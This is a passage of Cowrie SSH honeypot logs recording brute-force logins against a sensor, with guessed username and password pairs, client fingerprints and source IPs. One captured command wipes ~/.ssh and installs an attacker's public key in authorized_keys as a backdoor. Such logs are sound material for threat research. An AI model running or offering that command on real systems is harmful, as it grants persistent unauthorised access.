.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:47.780240Z","src_ip":"170.64.166.123","session":"cb54ac1d8f46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36182,"dst_ip":"1.2.3.4","dst_port":22,"session":"a219ed462935","protocol":"ssh","message":"New connection: 212.227.235.229:36182 (1.2.3.4:22) [session: a219ed462935]","sensor":"my-vps","timestamp":"2025-08-31T05:49:48.427512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:48.430036Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:48.685264Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1q2w3e!@#","message":"login attempt [ubuntu/1q2w3e!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:48.937005Z","src_ip":"170.64.166.123","session":"cb54ac1d8f46"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123@","message":"login attempt [root/qwerty123@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:49:49.708705Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:50.217838Z","src_ip":"170.64.166.123","session":"cb54ac1d8f46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:49:50.240795Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:49:50.241515Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:49:50.242520Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:50.501650Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:49:51.081645Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.082522Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.342176Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.343093Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37302,"dst_ip":"1.2.3.4","dst_port":22,"session":"b184b4570102","protocol":"ssh","message":"New connection: 212.227.235.229:37302 (1.2.3.4:22) [session: b184b4570102]","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.596496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.598080Z","src_ip":"212.227.235.229","session":"b184b4570102"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:51.853516Z","src_ip":"212.227.235.229","session":"b184b4570102"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:52.878612Z","src_ip":"212.227.235.229","session":"b184b4570102"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:54.139029Z","src_ip":"212.227.235.229","session":"b184b4570102"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38238,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dc0fefbc47d","protocol":"ssh","message":"New connection: 212.227.235.229:38238 (1.2.3.4:22) [session: 3dc0fefbc47d]","sensor":"my-vps","timestamp":"2025-08-31T05:49:54.396008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:54.396897Z","src_ip":"212.227.235.229","session":"3dc0fefbc47d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:54.657950Z","src_ip":"212.227.235.229","session":"3dc0fefbc47d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60408,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d54cb901d9","protocol":"ssh","message":"New connection: 212.227.125.160:60408 (1.2.3.4:22) [session: f3d54cb901d9]","sensor":"my-vps","timestamp":"2025-08-31T05:49:54.761326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:49:55.272902Z","src_ip":"212.227.125.160","session":"f3d54cb901d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:49:55.273552Z","src_ip":"212.227.125.160","session":"f3d54cb901d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:49:55.728730Z","src_ip":"212.227.235.229","session":"3dc0fefbc47d"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:55.986804Z","src_ip":"212.227.235.229","session":"a219ed462935"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:55.987946Z","src_ip":"212.227.235.229","session":"3dc0fefbc47d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:56.628972Z","src_ip":"212.227.235.229","session":"b0fcf1e8cd75"}
{"eventid":"cowrie.login.failed","username":"test2","password":"admin123","message":"login attempt [test2/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:57.596071Z","src_ip":"212.227.125.160","session":"f3d54cb901d9"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:58.968076Z","src_ip":"212.227.125.160","session":"f3d54cb901d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58212,"dst_ip":"1.2.3.4","dst_port":22,"session":"4471b8655e90","protocol":"ssh","message":"New connection: 212.227.235.229:58212 (1.2.3.4:22) [session: 4471b8655e90]","sensor":"my-vps","timestamp":"2025-08-31T05:50:07.973623Z"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:09.415864Z","src_ip":"212.227.235.229","session":"86ced795f9f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36062,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d90e503849","protocol":"ssh","message":"New connection: 212.227.235.229:36062 (1.2.3.4:22) [session: f2d90e503849]","sensor":"my-vps","timestamp":"2025-08-31T05:50:09.769543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:50:09.770529Z","src_ip":"212.227.235.229","session":"f2d90e503849"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:50:10.059361Z","src_ip":"212.227.235.229","session":"f2d90e503849"}
{"eventid":"cowrie.login.failed","username":"wesley","password":"wesley123","message":"login attempt [wesley/wesley123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:11.257063Z","src_ip":"212.227.235.229","session":"f2d90e503849"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:12.548645Z","src_ip":"212.227.235.229","session":"f2d90e503849"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60390,"dst_ip":"1.2.3.4","dst_port":22,"session":"56abb94b9eac","protocol":"ssh","message":"New connection: 217.72.205.35:60390 (1.2.3.4:22) [session: 56abb94b9eac]","sensor":"my-vps","timestamp":"2025-08-31T05:50:12.735775Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:12.737459Z","src_ip":"217.72.205.35","session":"56abb94b9eac"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:50:14.726207Z","src_ip":"212.227.235.229","session":"4471b8655e90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:50:14.727426Z","src_ip":"212.227.235.229","session":"4471b8655e90"}
{"eventid":"cowrie.session.closed","duration":"113.8","message":"Connection lost after 113.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:15.867507Z","src_ip":"212.227.235.229","session":"86ced795f9f2"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:19.888829Z","src_ip":"212.227.125.160","session":"34174d6cc2ef"}
{"eventid":"cowrie.session.closed","duration":"75.8","message":"Connection lost after 75.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:26.101171Z","src_ip":"212.227.125.160","session":"34174d6cc2ef"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:32.102638Z","src_ip":"212.227.235.229","session":"4471b8655e90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49030,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ceb67553f3d","protocol":"ssh","message":"New connection: 212.227.235.229:49030 (1.2.3.4:22) [session: 7ceb67553f3d]","sensor":"my-vps","timestamp":"2025-08-31T05:50:32.951166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:50:34.103883Z","src_ip":"212.227.235.229","session":"7ceb67553f3d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:50:34.104992Z","src_ip":"212.227.235.229","session":"7ceb67553f3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45444,"dst_ip":"1.2.3.4","dst_port":22,"session":"16311c3d4bef","protocol":"ssh","message":"New connection: 212.227.235.229:45444 (1.2.3.4:22) [session: 16311c3d4bef]","sensor":"my-vps","timestamp":"2025-08-31T05:50:36.203690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:50:36.204586Z","src_ip":"212.227.235.229","session":"16311c3d4bef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:50:36.486695Z","src_ip":"212.227.235.229","session":"16311c3d4bef"}
{"eventid":"cowrie.session.closed","duration":"28.7","message":"Connection lost after 28.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:36.642200Z","src_ip":"212.227.235.229","session":"4471b8655e90"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"passwd","message":"login attempt [ftpuser/passwd] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:37.654958Z","src_ip":"212.227.235.229","session":"16311c3d4bef"}
